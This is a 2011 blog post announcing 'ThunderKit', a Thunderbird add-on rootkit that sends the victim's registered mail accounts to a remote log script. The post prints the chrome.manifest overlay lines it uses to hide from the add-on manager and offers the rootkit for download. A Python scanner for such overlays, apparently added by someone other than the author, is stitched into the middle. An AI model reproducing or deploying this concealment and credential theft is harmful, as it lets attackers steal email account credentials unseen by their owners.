Wednesday, October 26, 2011

ThunderKit – Thunderbird Rootkit

It's been a while since I posted something on this blog; from now on I'll try to be more regular.
Well, today I bring you ThunderKit, the very first Thunderbird rootkit. This is really nothing new, except for the extension hiding method, which is compatible with the more recent Thunderbird and Firefox versions.

ThunderKit is a very simple rootkit that can hide itself from Thunderbird. Every time the victim starts Thunderbird, it retrieves all registered accounts from the current profile and sends them to a target log script, specified by a URL.

The rootkit hides itself by setting an overlay on “about:addons”, the add-on manager of Thunderbird, which is the same in Firefox; previous versions are supported as well.

# Thunderbird 2
overlay    chrome://mozapps/content/extensions/extensions.xul    chrome://thunderkit/content/hidden.xul
overlay    chrome://mozapps/content/extensions/extensions.xul?type=extensions    chrome://thunderkit/content/hidden.xul

# Thunderbird 3
overlay    about:addons    chrome://thunderkit/content/hidden.xul
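
A defender's check for the hiding trick above, added here as an example (not code from ThunderKit or from this post): it reads the chrome.manifest out of an XPI, which is a zip archive, and lists overlay directives aimed at the add-on manager documents named above. The function names and the sample manifest are constructed for illustration; a hit is a lead to review, since an overlay on the add-on manager is not malicious by itself.

```python
import io
import zipfile

# Add-on manager documents this page names as overlay targets.
ADDON_MANAGER_TARGETS = (
    "about:addons",
    "chrome://mozapps/content/extensions/extensions.xul",
)

def suspicious_overlays(manifest_text):
    """Return (line_no, target, overlay) for overlays aimed at the add-on manager."""
    hits = []
    for line_no, raw in enumerate(manifest_text.splitlines(), 1):
        fields = raw.split()
        if len(fields) < 3 or fields[0] != "overlay":
            continue  # comments, blank lines and other directives
        target, overlay = fields[1], fields[2]
        # Compare without a query string such as ?type=extensions.
        if target.split("?", 1)[0].lower() in ADDON_MANAGER_TARGETS:
            hits.append((line_no, target, overlay))
    return hits

def scan_xpi(xpi_bytes):
    """Open the XPI as a zip archive and scan its chrome.manifest, if any."""
    with zipfile.ZipFile(io.BytesIO(xpi_bytes)) as xpi:
        if "chrome.manifest" not in xpi.namelist():
            return []
        text = xpi.read("chrome.manifest").decode("utf-8", errors="replace")
    return suspicious_overlays(text)

# Constructed sample: a benign main-window overlay plus the three lines above.
SAMPLE_MANIFEST = """\
content thunderkit content/
overlay chrome://messenger/content/messenger.xul chrome://example/content/toolbar.xul
# Thunderbird 2
overlay chrome://mozapps/content/extensions/extensions.xul chrome://thunderkit/content/hidden.xul
overlay chrome://mozapps/content/extensions/extensions.xul?type=extensions chrome://thunderkit/content/hidden.xul
# Thunderbird 3
overlay about:addons chrome://thunderkit/content/hidden.xul
"""

def build_sample_xpi():
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("chrome.manifest", SAMPLE_MANIFEST)
    return buf.getvalue()

if __name__ == "__main__":
    for line_no, target, overlay in scan_xpi(build_sample_xpi()):
        print(f"chrome.manifest:{line_no}: {overlay} overlays {target}")
```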

ThunderKit was tested with the latest version of Thunderbird (7.0), but I think it works in previous versions too, at least all versions with XHR support.

Download Addon (unpack to view the source (xpi = zip))

Enjoy!